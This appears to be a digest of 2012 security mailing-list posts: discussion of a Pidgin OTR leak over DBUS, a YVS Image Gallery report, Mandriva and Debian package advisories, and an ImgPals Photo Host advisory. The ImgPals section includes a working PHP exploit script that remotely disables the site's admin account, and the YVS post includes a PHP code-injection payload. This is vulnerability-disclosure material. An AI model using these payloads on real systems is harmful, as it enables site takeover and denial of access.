Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote: On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: I think you didn't understood the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation. This is not what the OP or CVE describe: plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue. I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attatck due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good a separating processes and sessions so that data does not comingle. Jeff
Re: [oss-security] Case YVS Image Gallery
On Mon, Feb 27, 2012 at 09:31:52AM -0700, Kurt Seifried wrote: If you make a list of issues (e.g. XSS, CSRF, etc) with the code examples I can assign the various blocks of issues CVEs. 1. ./administration/install.php opens ../functions/db_connect.php and writes to file without input validation leading to PHP code injection with all variables if any contains for example: ;} ? ?php print(Hello World); exit() ? Note that install guide in web says: after instalation is complete, delete the install.php file and install.php does not need permissions. 2. ./administration/create_album.php does not have proper input validation leading to stored XSS, which can only be added by administrators, but I don't think this as a limit after other vulnerabilities. XSS will also be shown to normal users (mainpage). - Henri Salo
Re: [Full-disclosure] pidgin OTR information leakage
On 02/27/2012 11:23 PM, devn...@vonage.com wrote: I believe that clarification is in order. Indeed it is. The original post mentions a same-user attack vector which is very misleading as to what the real problem here is. And it boils down to this: Once a process sends private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it. So, if for example the user selects not to log OTR plaintext (so that this sensitive information doesn't touch the hard drive) another application on the other end of DBUS might choose to do something different (and not by malicious intent). There is no way to enforce the same security policy on the sender and the receivers. How this could be exploited by attackers or what forensic evidence DBUS snooping leaves are of much less importance than the above privacy issue. There is a very good discussion on the pidgin ticket page: http://developer.pidgin.im/ticket/14830 Also, I've made some updates to our post, to make it clearer as to what this issue is about: http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/ If there are still questions, I'll be happy to answer them. Hope this clarifies things a bit, Dimitris
Re: [Full-disclosure] pidgin OTR information leakage
On 02/28/2012 12:14 AM, Dimitris Glynos wrote: On 02/27/2012 11:23 PM, devn...@vonage.com wrote: I believe that clarification is in order. Indeed it is. The original post mentions a same-user attack vector which is very misleading as to what the real problem here is. And it boils down to this: Once a process sends private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it. This should be: Once a process *broadcasts* private info over DBUS there is no way to control where this ends up (which apps are the qualified receivers) or what the receivers do with it. So, if for example the user selects not to log OTR plaintext (so that this sensitive information doesn't touch the hard drive) another application on the other end of DBUS might choose to do something different (and not by malicious intent). There is no way to enforce the same security policy on the sender and the receivers. How this could be exploited by attackers or what forensic evidence DBUS snooping leaves are of much less importance than the above privacy issue. There is a very good discussion on the pidgin ticket page: http://developer.pidgin.im/ticket/14830 Also, I've made some updates to our post, to make it clearer as to what this issue is about: http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/ If there are still questions, I'll be happy to answer them. Hope this clarifies things a bit, Dimitris
[ MDVSA-2012:023-1 ] libvpx
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:023-1 http://www.mandriva.com/security/ ___ Package : libvpx Date: February 28, 2012 Affected: 2010.1, 2011. ___ Problem Description: A vulnerability has been found and corrected in libvpx: VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers to cause a denial of service (application crash) via (1) unspecified corrupt input or (2) by starting decoding from a P-frame, which triggers an out-of-bounds read, related to the clamping of motion vectors in SPLITMV blocks (CVE-2012-0823). The updated packages have been patched to correct this issue. Update: This is a symbolic advisory correction because there was a clash with MDVSA-2012:023 that addressed libxml2. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823 ___ Updated Packages: Mandriva Linux 2010.1: 80595bcf9605087872ef9e76988c06fb 2010.1/i586/libvpx0-0.9.7-0.2mdv2010.2.i586.rpm 6a39a655e52324d5454df93c54803e1d 2010.1/i586/libvpx-devel-0.9.7-0.2mdv2010.2.i586.rpm 36669f19119055daa1c65a4341bf00ee 2010.1/i586/libvpx-utils-0.9.7-0.2mdv2010.2.i586.rpm efbc2e9f8338a146ed9bb4a8133ee3d0 2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 7d42ba1449797b928a025d82fbbf2a65 2010.1/x86_64/lib64vpx0-0.9.7-0.2mdv2010.2.x86_64.rpm 05101dfd30ef938952f61705a1394705 2010.1/x86_64/lib64vpx-devel-0.9.7-0.2mdv2010.2.x86_64.rpm 20e10865900d2a24d58b7677098057e8 2010.1/x86_64/libvpx-utils-0.9.7-0.2mdv2010.2.x86_64.rpm efbc2e9f8338a146ed9bb4a8133ee3d0 2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm Mandriva Linux 2011: e77c03974267d8b697fce1944dc7627b 2011/i586/libvpx0-0.9.7-0.2-mdv2011.0.i586.rpm e52f1469cdf005a7a8e2855a65bfde2f 2011/i586/libvpx-devel-0.9.7-0.2-mdv2011.0.i586.rpm 6fbe1b807480c8c86d482cef51f5cc7d 2011/i586/libvpx-utils-0.9.7-0.2-mdv2011.0.i586.rpm e274966b396ce1cb66aa4b01f2bea88e 2011/SRPMS/libvpx-0.9.7-0.2.src.rpm Mandriva Linux 2011/X86_64: 81c2210c4f37421a22a877599304b5a4 2011/x86_64/lib64vpx0-0.9.7-0.2-mdv2011.0.x86_64.rpm 02f987fb0972c5b45a91a3d02060923f 2011/x86_64/lib64vpx-devel-0.9.7-0.2-mdv2011.0.x86_64.rpm a7d46c97d8294236422b37a8359ba64d 2011/x86_64/libvpx-utils-0.9.7-0.2-mdv2011.0.x86_64.rpm e274966b396ce1cb66aa4b01f2bea88e 2011/SRPMS/libvpx-0.9.7-0.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPTL06mqjQ0CJFipgRAmSwAKC3SrXDSm5poitKzRLbK3HdV0s5XwCgqOwj GCMzTwqDabkLHPmw9/sT7lk= =XrZF -END PGP SIGNATURE-
ImgPals Photo Host Version 1.0 Admin Account Disactivation
-=[ADVISORY---]=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [corry...@gmail.com] -=[---]=- -=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. I released the ImgPals Photo Host Version 1.0 STABLE Features Include: * Easy Install * Full README file included * Full Control Panel to control your site * User Side Features o Multiple JQuery Uploads o Create and Edit Photo Albums o Make Albums Public or Private o Describe Albums and Photos o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos o Add Friends o Chat with Friends o Update people with status wall posting o Manage Profile o Profile Avatar Uploads o Private Messaging * And much more, be sure to check out the Demo ...::[ Bug ]::.. A attaker can remotely disable the account from administratore not allowing the same to be able to access the site ...::[ Proof Of Concept ]::.. if ($_GET['a'] == 'app0'){ $sqlapprove = mysql_query(UPDATE members SET approved = '0' WHERE id = '.$_GET['u'].'); by sending the command approve.php? u = a = 1 app0 a attaker can disable the Administrator account. ...::[ Exploit ]::.. #!/usr/bin/php -f ?php //Coded by Corrado Liotta For educational purpose only //use php exploit.php server app0 or app1 //use app0 for admin account off //use app1 for admin account on $target = $argv[1]; $power = $argv[2] $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, http://$target/approve.php?u=1a=$power;); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?
[ MDVSA-2012:025 ] samba
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:025 http://www.mandriva.com/security/ ___ Package : samba Date: February 28, 2012 Affected: Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in samba: Heap-based buffer overflow in process.c in smbd in Samba allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a Batched (aka AndX) request that triggers infinite recursion (CVE-2012-0870). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870 ___ Updated Packages: Mandriva Enterprise Server 5: f1c5c40a39960bf0be8b4f7b0eb07f1c mes5/i586/libnetapi0-3.3.12-0.8mdvmes5.2.i586.rpm c09851ea48666122ce67fb3bb5d863b7 mes5/i586/libnetapi-devel-3.3.12-0.8mdvmes5.2.i586.rpm 574874125ee63e520110e73158fa1c53 mes5/i586/libsmbclient0-3.3.12-0.8mdvmes5.2.i586.rpm ed39a5badbcb3dff984d099d995e4654 mes5/i586/libsmbclient0-devel-3.3.12-0.8mdvmes5.2.i586.rpm 37f6c8edc6af9e4439fe1cfa74162fd4 mes5/i586/libsmbclient0-static-devel-3.3.12-0.8mdvmes5.2.i586.rpm e06527be75deb64802f8bfa4c266f9bc mes5/i586/libsmbsharemodes0-3.3.12-0.8mdvmes5.2.i586.rpm 9926b5aa94649fe5e4563d7d30eea094 mes5/i586/libsmbsharemodes-devel-3.3.12-0.8mdvmes5.2.i586.rpm 13ed1d18924705829149f27c89cff483 mes5/i586/libtalloc1-3.3.12-0.8mdvmes5.2.i586.rpm 0dcc0cadaff5d3e9e9b26a4aa76320b9 mes5/i586/libtalloc-devel-3.3.12-0.8mdvmes5.2.i586.rpm f66dc353d8f7cc28d9e9922bc731bd06 mes5/i586/libtdb1-3.3.12-0.8mdvmes5.2.i586.rpm 87689dca4f04ccc56c8b7e2958f870a5 mes5/i586/libtdb-devel-3.3.12-0.8mdvmes5.2.i586.rpm eac4493389bdd505786b2a813800ec21 mes5/i586/libwbclient0-3.3.12-0.8mdvmes5.2.i586.rpm 0a4d9665399a405ec33352bac8b085d7 mes5/i586/libwbclient-devel-3.3.12-0.8mdvmes5.2.i586.rpm 31d01f8f5ac236bdeb5da6c0b1103c26 mes5/i586/mount-cifs-3.3.12-0.8mdvmes5.2.i586.rpm 4d65a41c7adf287f33146cb51976c12f mes5/i586/nss_wins-3.3.12-0.8mdvmes5.2.i586.rpm 95851e4895bebace6a800c21411c2c98 mes5/i586/samba-client-3.3.12-0.8mdvmes5.2.i586.rpm 615ae2342634aa724e233fe7c38e1021 mes5/i586/samba-common-3.3.12-0.8mdvmes5.2.i586.rpm 593f4559e2e7927c3d2be07c75f69fc2 mes5/i586/samba-doc-3.3.12-0.8mdvmes5.2.i586.rpm 082b8b10f48f87102f5f4e5734192274 mes5/i586/samba-server-3.3.12-0.8mdvmes5.2.i586.rpm 671a8293f5c9970eff7f41a382ce1de8 mes5/i586/samba-swat-3.3.12-0.8mdvmes5.2.i586.rpm d0826b2d50dd03a8a2def0ab8217a10b mes5/i586/samba-winbind-3.3.12-0.8mdvmes5.2.i586.rpm e63162eb725a3c786a9d6ce6e3ffa834 mes5/SRPMS/samba-3.3.12-0.8mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 08052ae7f504d3afebc2592c4563cb26 mes5/x86_64/lib64netapi0-3.3.12-0.8mdvmes5.2.x86_64.rpm 959b440b7a52de85774c7826c23e5a0d mes5/x86_64/lib64netapi-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 4fbf3c6550bbd781101b19a5f59db31f mes5/x86_64/lib64smbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm fa0e52cf4f492cb5d991ca5305f4eca7 mes5/x86_64/lib64smbclient0-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 3aab55b5470b2dd3fe21bc22aac57881 mes5/x86_64/lib64smbclient0-static-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 62faaa06906b9b03f73d130c30841e24 mes5/x86_64/lib64smbsharemodes0-3.3.12-0.8mdvmes5.2.x86_64.rpm 2989b58fbd3b45bc9f59c252c694970f mes5/x86_64/lib64smbsharemodes-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 7b02247f56fbae2c39148fbbdb2a9753 mes5/x86_64/lib64talloc1-3.3.12-0.8mdvmes5.2.x86_64.rpm c06c34fbdf4472157ce75f438c8975fe mes5/x86_64/lib64talloc-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 05412945bb2a1b2be22aab619395366e mes5/x86_64/lib64tdb1-3.3.12-0.8mdvmes5.2.x86_64.rpm a5d3e798398970a92129d182766049ab mes5/x86_64/lib64tdb-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm fa4659a2d3591b354ed48fe4780e318a mes5/x86_64/lib64wbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm a647ebd6ed3d00f8e0cf32db8deddd89 mes5/x86_64/lib64wbclient-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm 5075846b37b482eee78d1390284d221f mes5/x86_64/mount-cifs-3.3.12-0.8mdvmes5.2.x86_64.rpm 08968a5c3682f2af4dab4433d3c4906c mes5/x86_64/nss_wins-3.3.12-0.8mdvmes5.2.x86_64.rpm 1f391d0c654c0efa93a4a9b90ff8abad mes5/x86_64/samba-client-3.3.12-0.8mdvmes5.2.x86_64.rpm 9d374a84dab147dd3a7e20f38032740f mes5/x86_64/samba-common-3.3.12-0.8mdvmes5.2.x86_64.rpm fbc801397a2f7b94b06397aed9e037a8 mes5/x86_64/samba-doc-3.3.12-0.8mdvmes5.2.x86_64.rpm 39fde58a25e8180b574cf6e5a8f7e432 mes5/x86_64/samba-server-3.3.12-0.8mdvmes5.2.x86_64.rpm d9f108c12ade5b0f8905cb453cdb99dc
[SECURITY] [DSA 2420-1] openjdk-6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2420-1 secur...@debian.org http://www.debian.org/security/Florian Weimer February 28, 2012 http://www.debian.org/security/faq - - Package: openjdk-6 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3377 CVE-2011-3563 CVE-2011-5035 CVE-2012-0497 CVE-2012-0501 CVE-2012-0502 CVE-2012-0503 CVE-2012-0505 CVE-2012-0506 CVE-2012-0507 Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform. CVE-2011-3377 The Iced Tea browser plugin included in the openjdk-6 package does not properly enforce the Same Origin Policy on web content served under a domain name which has a common suffix with the required domain name. CVE-2011-3563 The Java Sound component did not properly check for array boundaries. A malicious input or an untrusted Java application or applet could use this flaw to cause Java Virtual Machine to crash or disclose portion of its memory. CVE-2011-5035 The OpenJDK embedded web server did not guard against an excessive number of a request parameters, leading to a denial of service vulnerability involving hash collisions. CVE-2012-0497 It was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer. This could lead to JVM crash or Java sandbox bypass. CVE-2012-0501 The ZIP central directory parser used by java.util.zip.ZipFile entered an infinite recursion in native code when processing a crafted ZIP file, leading to a denial of service. CVE-2012-0502 A flaw was found in the AWT KeyboardFocusManager class that could allow untrusted Java applets to acquire keyboard focus and possibly steal sensitive information. CVE-2012-0503 The java.util.TimeZone.setDefault() method lacked a security manager invocation, allowing an untrusted Java application or applet to set a new default time zone. CVE-2012-0505 The Java serialization code leaked references to serialization exceptions, possibly leaking critical objects to untrusted code in Java applets and applications. CVE-2012-0506 It was discovered that CORBA implementation in Java did not properly protect repository identifiers (that can be obtained using _ids() method) on certain Corba objects. This could have been used to perform modification of the data that should have been immutable. CVE-2012-0507 The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine to crash or bypass Java sandbox restrictions For the stable distribution (squeeze), these problems have been fixed in version 6b18-1.8.13-0+squeeze1. For the testing distribution (wheezy) and the unstable distribution (sid), these problems have been fixed in version 6b24-1.11.1-1. We recommend that you upgrade your openjdk-6 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPTTmbAAoJEL97/wQC1SS+lqwH/1F5hffrk0ciMajdYvUuPgs5 tDeo+Sq6WwZqSYJFYsXDyyxtLProzR9Szi4n0O5942nUqRV6UtzxsvWPoQVm+gVF c9waYDogwr7X6KNUdhLoWRwR0wZm5lryLPUNPx1AGJd0CstxJJ3cFX243m2F0+03 BuDU4QuwMliS5YpvEJ3JUFA4zZ3ETwa033poeOD9Pkh5Y8wfbaiYM6/0yvI/lIDC EmszvApi8iM/Q6s5olvFgHpv+J2aiLR6IYmP8wWJLd2vvGpukoix06U/eqF0NirT ilZaZmw1YGultG34yWP95TaF5+AOYgkm5g80SeHX2B3iL2u1cd1xklo6i2eGVBE= =jUub -END PGP SIGNATURE-